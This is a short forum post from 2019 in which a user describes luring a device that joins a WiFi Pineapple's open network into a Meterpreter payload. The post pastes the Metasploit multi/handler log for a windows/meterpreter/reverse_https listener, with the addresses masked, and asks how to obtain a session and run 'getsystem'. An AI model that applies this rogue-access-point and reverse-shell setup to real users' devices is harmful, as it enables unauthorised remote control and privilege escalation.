hanshaze Posted June 19, 2019 Posted June 19, 2019 Hi..... 1. On a Pi0w-P4wnP1-ALOA i run a https listener 2. in the Pineapple Nano Meterpreter webmodule i enter LHOST and LPORT of the listener..... 3. now i connect a 3rd device to the nano-hosted "openWiF" and surf to the landing page in a webbrowser.... 4. after a few seconds on the Pi Zero console that happens =[ metasploit v5.0.29-dev ] + -- --=[ 1898 exploits - 1068 auxiliary - 329 post ] + -- --=[ 547 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] [*] Processing /home/pi/.scripts/listen.rc for ERB directives. resource (/home/pi/.scripts/listen.rc)> use multi/handler resource (/home/pi/.scripts/listen.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/home/pi/.scripts/listen.rc)> set LHOST xxx.xxx.xxx.xxx LHOST => xxx.xxx.xxx.xxx resource (/home/pi/.scripts/listen.rc)> set LPORT xxxx LPORT => xxxx resource (/home/pi/.scripts/listen.rc)> set ExitOnSession true ExitOnSession => true resource (/home/pi/.scripts/listen.rc)> set AutoVerifySession false AutoVerifySession => false resource (/home/pi/.scripts/listen.rc)> set AutoSystemInfo false AutoSystemInfo => false resource (/home/pi/.scripts/listen.rc)> set AutoLoadStdapi false AutoLoadStdapi => false resource (/home/pi/.scripts/listen.rc)> exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://xxx.xxx.xxx.xxx:xxxx And no more not less? 🤷♂️ My question is how to get an active meterpreter session to use stuff like "getuid" and "getsystem"!
Recommended Posts
Archived
This topic is now archived and is closed to further replies.